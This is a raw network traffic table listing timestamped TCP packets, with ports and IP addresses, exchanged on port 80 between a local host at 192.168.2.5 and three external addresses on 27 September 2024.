Sep 27, 2024 04:21:17.524920940 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.524981022 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524991035 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525001049 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525012970 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525021076 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.525021076 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.525024891 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525034904 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525072098 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.525072098 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.525772095 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525784016 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525793076 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525816917 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525825977 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525834084 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.525836945 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525849104 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525892973 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.525892973 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.525909901 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525921106 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525932074 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525943041 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525954008 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.525955915 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.525964975 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526007891 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.526007891 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.526716948 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526727915 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526738882 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526766062 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526776075 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526787996 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526798010 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526815891 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.526815891 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.526871920 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526881933 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526892900 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526904106 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526910067 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.526910067 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.526913881 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526925087 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.526963949 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.526963949 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.527607918 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.527714968 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.527750969 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.527750969 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.533493042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.533505917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.533521891 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.533533096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.533543110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.533555984 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.533567905 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.533612967 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.533627987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.533638954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.533665895 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.540823936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.540837049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.540848970 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.540859938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.540872097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.540875912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.540884018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.540895939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.540910959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.540918112 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.540955067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.543068886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.543080091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.543090105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.543128967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.543131113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.543142080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.543153048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.543168068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.543196917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.543371916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.543391943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.543441057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.547552109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547563076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547573090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547590971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547601938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547610044 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.547612906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547626972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547637939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547646999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.547673941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.547924995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547935009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547945976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547959089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547976017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.547977924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.547992945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.548002958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.548006058 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.548018932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.548036098 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.548057079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.549048901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549061060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549073935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549092054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549099922 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.549103022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549118042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549129009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549139023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549144983 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.549215078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.549283981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.549350023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.549355984 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.549361944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.549375057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.549386024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.549396992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.549397945 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.549422026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.549437046 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.549460888 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.549690008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549740076 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.549777985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549787998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549810886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549820900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.549823999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549835920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549840927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.549849987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549860954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.549864054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.549899101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.550221920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550235033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550246000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550276995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.550311089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550322056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550323009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.550334930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550347090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550358057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550359964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.550368071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550399065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550405025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.550412893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550457954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550467968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550477028 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.550484896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550497055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.550497055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550512075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.550529957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.550563097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.551148891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551161051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551171064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551186085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551206112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551213026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.551218033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551230907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551243067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551254034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551265001 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.551286936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551295996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.551302910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551315069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551321983 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.551325083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551338911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.551364899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.551398039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.562288046 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.562300920 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.562310934 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.562329054 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.562339067 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.562349081 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.562364101 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.562392950 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.562402964 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.562413931 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.562494040 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.575258970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575269938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575279951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575294018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575309992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575320959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575330019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.575334072 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575345993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575402975 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.575711966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575721979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575731993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575752020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575761080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575771093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575774908 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.575782061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.575820923 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.576462030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.576473951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.576484919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.576509953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.576519966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.576522112 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.576530933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.576544046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.576567888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.576585054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.576592922 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.576623917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579212904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579225063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579235077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579252958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579262972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579273939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579281092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579288960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579333067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579351902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579363108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579374075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579391003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579396963 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579421043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579471111 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579504013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579520941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579531908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579541922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579552889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579555035 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579571009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579581976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579588890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579596996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579627991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579643965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579655886 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579655886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579668999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.579699993 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.579730988 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.598841906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.598862886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.598875046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.598886013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.598897934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.598908901 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.598911047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.598923922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.598963022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.598999023 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.599417925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.599430084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.599442959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.599464893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.599476099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.599487066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.599490881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.599503994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.599509954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.599550009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.608145952 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608227015 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608237982 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608283043 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608294010 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608304977 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608315945 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608330011 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608354092 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608354092 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608380079 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608447075 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608457088 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608467102 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608477116 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608488083 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608499050 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608510017 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608511925 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608511925 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608520985 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608556986 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608556986 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608587027 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608597994 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608608007 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608619928 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608628988 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608630896 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608649015 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608702898 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608714104 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608717918 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608726025 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608736992 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608747959 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608758926 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608809948 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608809948 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608906984 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608917952 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608928919 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608956099 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.608969927 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608982086 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.608999968 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609004974 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609010935 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609010935 CEST	49722	80	192.168.2.5	185.215.113.17
